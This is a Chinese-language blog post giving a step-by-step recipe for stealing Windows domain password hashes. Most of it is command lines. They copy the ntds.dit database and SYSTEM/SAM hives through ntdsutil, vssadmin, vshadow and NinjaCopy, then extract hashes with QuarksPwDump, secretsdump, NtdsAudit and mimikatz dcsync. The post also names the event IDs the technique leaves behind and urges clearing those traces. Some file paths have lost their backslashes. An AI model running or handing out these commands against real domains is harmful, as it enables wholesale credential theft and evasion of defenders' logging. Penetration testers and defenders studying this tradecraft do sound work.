您现在的位置是:首页 >技术杂谈 >域内密码凭证获取网站首页技术杂谈

域内密码凭证获取

不习惯有你 2023-06-16 20:00:02
简介域内密码凭证获取

Volume Shadow Copy

活动目录数据库

ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。它还包括域中所有用户的哈希值。

ntds.dit文件位置:%SystemRoot%NTDSNTDS.dit

system文件位置:%SystemRoot%System32configSystem

sam文件位置:%SystemRoot%System32configSAM

%SystemRoot%是系统安装目录,C:Windows

AD DS数据库存储:

  • 由ntds.dit文件构成
  • 默认存储在所有域控制器上的%SystemRoot%NTDS文件夹中
  • 只能通过域控制器进程和协议访问

由于Windows阻止这些文件的标准读取或复制操作,因此必须使用特殊技术来获取副本

Volume Shadow Copy(卷影复制

方法一:ntdsutil命令行工具获取

交互式:

ntdsutil
snapshot
activate instance ntds
create
mount [GUID]    //mount挂载
unmount [GUID]    //copy完成后再执行卸载
del [GUID]
quit
quit

非交互式:

1、查询当前系统的快照

ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit

 2、创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

3、挂载快照

ntdsutil snapshot "mount {GUID}" quit quit

 4、卸载快照

ntdsutil snapshot "unmount {GUID}" quit quit

5、删除快照

ntdsutil snapshot "delete {GUID}" quit quit

终极指令:

ntdsutil "activate instance ntds" ifm "create full c:hjw" quit quit

方法二:vssadmini

VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。

  • 用于创建或 删除卷影复制副本,列出卷影副本的信息
  • 用于显示所安装的所有卷影副本写入程序和提供程序
  • 改变卷影副本储存空间的大小

1、查询当前系统的 快照

vssadmin list shadows

2、创建快照

vssadmin create shadow /for=c:

 3、获得shadow copy volume name

\?GLOBALROOTDeviceHarddiskVolumeShadowCopy10

 4、复制ntds.dit

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy10windowsNTDS
tds.dit c:
tds3.dit

5、删除快照

vssadmin delete shadows /for=c: /quiet

方法三:vshadow

Vshadow:是一个简单的指令行工具,它允许任何人创建卷影拷贝。系统默认不支持,可以在Microsoft Mindows Software Development Kit(SDK)中获取工具。

1、查询当前系统的快照

vshadow.exe -q

2、创建快照

vshadow.exe -p -nw C:

详细参数说明

-p   -> persistent,备份操作或是重启系统不会删除
-nw -> no writers,用来提供创建速度
C:  -> 对应c盘

获得SnapshotSetID,SnapshotID,Shadow copy device name

3、复制ntds.dit

copy [Shadow copy device name]windows
tds
tds.dit c:
tds.dit

这个就是对应上面的第三个黄色框框

4、删除快照

vshadow -dx=ShadowCopySetId
vshadow -ds=ShadowCopyId

扩展:

  • 调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036

执行

ntdsutil snapshot "activate instance ntds" create quit quit

会额外产生EventID为98的日志文件

所以要记得清理痕迹

  • 访问快照中的文件

1、创建一个快照文件

vssadmin create shadow /for=c:

2、查看快照列表

vssadmin list shadows

3、创建符号链接访问快照中的文件

mklink /d c:hjw [卷影副本] 

删除符号链接

rd c:hjw

NinjaCopy

通过NinjaCopy获取域控服务器NTDS.dit文件

没有调用Volume Shadow Copy服务,所以不会产生7036

解密ntds.dit

1、QuarkPwDump

Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、域账户、缓存的域账户和Bitlocker。

  • 修复复制出来的数据库文件
esentutl /p /o ntds.dit

  • 使用QuarksPwDump直接读取信息并将结果导出至文件
QuarksPwDump.exe --dump-hash-domain --ntds-file ntds.dit --output cndragon.txt

  • 查看里面的数据
type cndragon.txt

2、Secretsdump

impacket套件中的secretsdump.py脚本解密,速度有点慢

secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

3、NtdsAudit

可以 十分高效的破解ntds文件并将全部域域用户信息导出方便查找域用户状态。

将ntds.dit文件和SYSTEM文件放在同已目录下执行命令

NtdsAudit.exe "ntds.dit" -s "system.hive" -p pwdump.txt --users-csv users.csv

这里很遗憾我没有操作成功

4、mimikatz

Mimikatz有一个功能(dscync),它可以利用目录复制信息(DRS),从NTDS.DIT文件中提取密码hash值。这里需要在域控主机上进行操作

  • 通过dcsync直接获取cn-dragon.cn域内所有用户hash
lsadump::dcsync /domain:cn-dragon.cn /all /csv

  • 查看所有用户的所有详细信息
privilege::debug    //必须先执行这个指令获取权限
lsadump::lsa /inject

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。